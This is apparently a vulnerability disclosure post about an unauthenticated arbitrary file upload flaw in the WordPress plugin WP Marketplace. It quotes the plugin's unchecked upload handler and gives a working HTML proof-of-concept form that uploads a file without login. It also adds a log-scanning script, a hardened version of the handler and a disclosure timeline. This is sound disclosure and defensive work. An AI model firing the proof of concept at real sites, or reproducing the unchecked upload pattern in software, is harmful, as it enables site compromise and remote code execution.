14 Oct

Arbitrary File Upload Vulnerability in WP Marketplace

When it comes to certain types of plugins you would hope that developers would be extra careful about security, eCommerce plugins being an obvious example, but we have continued to see poor security practices in that type of plugin. Among the vulnerabilities we have found in them this year have been two arbitrary file upload vulnerabilities, which is probably the type of vulnerability most likely to be exploited. As part of our monitoring of hacker activity we have just spotted another one, and this one is likely already being exploited.

Within the last day we had a request for the file /wp-content/plugins/wpmarketplace/css/extends_page.css, which is part of the plugin WP Marketplace. A request for a file from a plugin that isn't installed on a website is usually an indication that a hacker is probing for the plugin's presence before attempting to exploit something in it. We have also seen requests for the file in the third-party data we monitor.
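The probing pattern described above can be picked out of ordinary web server logs. The following script is an added example (not code from the original post or from the plugin): it scans access-log lines for requests to files under a plugin directory that does not exist on the site, and separately for any request carrying the task parameter that WP Marketplace's upload handler reacts to. The installed-plugin list and the log lines are constructed for the example; the file paths are the ones named in this post.

```php
<?php
// Added example, not code from the original post or the plugin.
// Scans access-log lines for (1) requests to assets of plugins that are not
// installed here and (2) requests naming task=wpmp_upload_previews.

// Assumed: plugin slugs actually present in wp-content/plugins/ on this site.
$installed = ['akismet', 'contact-form-7'];

// Constructed log lines in combined log format; the last two mimic the
// probe for extends_page.css followed by an upload attempt.
$log = <<<'LOG'
203.0.113.5 - - [14/Oct/2016:10:01:02 +0000] "GET /wp-content/plugins/akismet/_inc/akismet.css HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Oct/2016:10:02:41 +0000] "GET /index.php HTTP/1.1" 200 5678 "-" "Mozilla/5.0"
198.51.100.9 - - [14/Oct/2016:10:03:15 +0000] "GET /wp-content/plugins/wpmarketplace/css/extends_page.css HTTP/1.1" 404 210 "-" "python-requests/2.11"
198.51.100.9 - - [14/Oct/2016:10:03:16 +0000] "POST /wp-admin/admin-post.php?task=wpmp_upload_previews HTTP/1.1" 200 45 "-" "python-requests/2.11"
LOG;

/**
 * Returns one entry per suspicious request: a probe for an uninstalled
 * plugin, or an attempt to reach the wpmp_upload_previews handler.
 */
function find_suspicious_requests(string $log, array $installed): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Client IP, then the quoted request line (method, target, protocol), then status.
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
            continue;
        }
        $ip     = $m[1];
        $method = $m[2];
        $target = $m[3];
        $status = (int) $m[4];

        $path  = (string) parse_url($target, PHP_URL_PATH);
        $query = (string) parse_url($target, PHP_URL_QUERY);
        parse_str($query, $params);

        // 1. A file requested from a plugin directory that does not exist on this site.
        if (preg_match('#^/wp-content/plugins/([^/]+)/#', $path, $p) && !in_array($p[1], $installed, true)) {
            $hits[] = [
                'ip'      => $ip,
                'request' => "$method $target",
                'status'  => $status,
                'reason'  => "probe for uninstalled plugin {$p[1]}",
            ];
        }

        // 2. Any request naming the task that wpmp_upload_previews() handles.
        if (isset($params['task']) && $params['task'] === 'wpmp_upload_previews') {
            $hits[] = [
                'ip'      => $ip,
                'request' => "$method $target",
                'status'  => $status,
                'reason'  => 'upload attempt via task=wpmp_upload_previews',
            ];
        }
    }
    return $hits;
}

foreach (find_suspicious_requests($log, $installed) as $hit) {
    printf("%-14s HTTP %d  %-60s %s\n", $hit['ip'], $hit['status'], $hit['request'], $hit['reason']);
}
```

On a site where WP Marketplace is not installed the probe shows up as a 404 for extends_page.css and the subsequent upload attempt does nothing. Where the CSS file returns 200 the plugin is present, and the upload attempt that follows is the request to investigate, starting with a look for newly created files in /wp-content/uploads/wpmp-previews/.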

Since arbitrary file upload vulnerabilities are so likely to be exploited, one of the first things we look for when trying to determine what hackers might be exploiting in a plugin is that type of issue. In this case we quickly found one.

In the file /modules/additional-preview-images.php the function wpmp_upload_previews() is hooked to the init action whenever is_admin() returns true. is_admin() only reports that the request is for an admin-area page (anything under /wp-admin/, including admin-post.php and admin-ajax.php); it says nothing about whether the requester is logged in, let alone an Administrator, and init fires on every request:

if(is_admin())  {
    // is_admin() is true for any admin-area request, whether or not anyone is logged in.
    /*wp_enqueue_script('swfobject',plugins_url().'/wpmarketplace/uploadify/swfobject.js');
    wp_enqueue_script('uploadify',plugins_url().'/wpmarketplace/uploadify/jquery.uploadify.v2.1.4.min.js');
    wp_enqueue_style('uploadify',plugins_url().'/wpmarketplace/uploadify/uploadify.css');*/
 
    // init runs on every request, so the upload handler is reachable by unauthenticated visitors.
    add_action("init","wpmp_upload_previews");
    add_action("wp_ajax_wpmp_delete_preview","wpmp_delete_preview");
    add_filter("wpmp_meta_box","wpmp_meta_box_images");
}

wpmp_upload_previews() then saves the uploaded file to the file system without any check on who is making the request, and the only processing of the file name is the call to wpmp_format_name(); nothing checks the type of the file. That is an arbitrary file upload vulnerability:

function wpmp_upload_previews(){
     $adpdir = WPMP_IMAGE_DIR;
     // Only the presence of task=wpmp_upload_previews and an uploaded file is checked:
     // no capability check, no nonce, no file type validation.
     if((isset($_GET['task'],$_FILES['Filedata']['tmp_name']) && is_uploaded_file($_FILES['Filedata']['tmp_name'])   && $_GET['task']=='wpmp_upload_previews')){
        $tempFile = $_FILES['Filedata']['tmp_name'];    
        // The client-supplied name (after wpmp_format_name()) decides the stored file's name.
        $targetFile =  $adpdir ."wpdm-adp-". time().'-'.wpmp_format_name($_FILES['Filedata']['name']);
        move_uploaded_file($tempFile, $targetFile);
        echo basename($targetFile);        
        die();
     }
 
}
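For comparison, here is how the same handler looks once the missing checks are added. This is an added example written for this post, not the plugin's own code, and it makes assumptions the post does not state: the destination directory is still WPMP_IMAGE_DIR, the upload form is changed to send action=wpmp_upload_previews (admin-post.php's own dispatch parameter, instead of task) together with a nonce field named wpmp_nonce, and previews are expected to be JPEG, PNG or GIF images. It replaces both the add_action("init", ...) registration shown above and the function body.

```php
<?php
// Added example, not the plugin's own code. Assumptions: WPMP_IMAGE_DIR is
// still the destination, the form sends action=wpmp_upload_previews plus a
// nonce field named 'wpmp_nonce', and previews are JPEG/PNG/GIF images.

// admin_post_{action} runs only for logged-in users. The unauthenticated
// variant, admin_post_nopriv_{action}, is deliberately not registered, so an
// anonymous POST to admin-post.php now reaches no handler at all. This
// replaces add_action("init", "wpmp_upload_previews"), which ran on every
// request whenever is_admin() was true.
add_action('admin_post_wpmp_upload_previews', 'wpmp_upload_previews_hardened');

function wpmp_upload_previews_hardened()
{
    // Authorization: being on an admin URL is not a permission check.
    if (!current_user_can('upload_files')) {
        wp_die('You are not allowed to upload preview images.', '', ['response' => 403]);
    }

    // CSRF: the form must carry the field emitted by
    // wp_nonce_field('wpmp_upload_previews', 'wpmp_nonce'); check_admin_referer() dies otherwise.
    check_admin_referer('wpmp_upload_previews', 'wpmp_nonce');

    if (empty($_FILES['Filedata']['tmp_name']) || !is_uploaded_file($_FILES['Filedata']['tmp_name'])) {
        wp_die('No file was uploaded.', '', ['response' => 400]);
    }
    $tmp  = $_FILES['Filedata']['tmp_name'];
    $name = $_FILES['Filedata']['name'];

    // Content check: restrict the extension to the image types a preview can be.
    // wp_check_filetype_and_ext() matches the declared extension against this
    // list and corrects it when the image bytes say otherwise.
    $allowed = ['jpg|jpeg|jpe' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
    $check   = wp_check_filetype_and_ext($tmp, $name, $allowed);
    if (empty($check['ext']) || empty($check['type'])) {
        wp_die('Only JPEG, PNG and GIF previews are accepted.', '', ['response' => 415]);
    }
    // A file that merely carries an image extension is not enough: it must parse as an image.
    if (@getimagesize($tmp) === false) {
        wp_die('The uploaded file is not a valid image.', '', ['response' => 415]);
    }

    // Build the stored name server-side: sanitized base name, extension taken
    // from the validated type rather than from whatever the client sent.
    $base = sanitize_file_name(pathinfo($name, PATHINFO_FILENAME));
    if ($base === '') {
        $base = 'preview';
    }
    $target = trailingslashit(WPMP_IMAGE_DIR) . 'wpdm-adp-' . time() . '-' . $base . '.' . $check['ext'];

    if (!move_uploaded_file($tmp, $target)) {
        wp_die('Could not store the uploaded file.', '', ['response' => 500]);
    }

    echo esc_html(basename($target));
    exit;
}
```

Each of the three checks closes a separate hole in the original: the capability check stops anonymous and low-privilege users, the nonce stops a logged-in user from being made to upload via a cross-site form like the proof of concept below, and the type and extension validation stops a PHP file from landing in a web-accessible directory even when the request is legitimate.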

Development of the plugin stopped some time ago, so we are disclosing the vulnerability and notifying the Plugin Directory.

On the plugin’s page on wordpress.org, it is mentioned at the top that the developers of this plugin are also the developers of the WordPress Download Manager plugin, for which we discovered an authenticated arbitrary file upload vulnerability nearly four months ago that still has not been fixed. So security doesn’t seem to be a priority for them in general.

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/wpmp-previews/ without the requester being logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-post.php?task=wpmp_upload_previews" method="POST" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 10/14/2016 – WordPress.org Plugin Directory notified.
  • 10/14/2016 – Plugin removed from WordPress.org Plugin Directory.

Concerned About The Security of The Plugins You Use?

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.
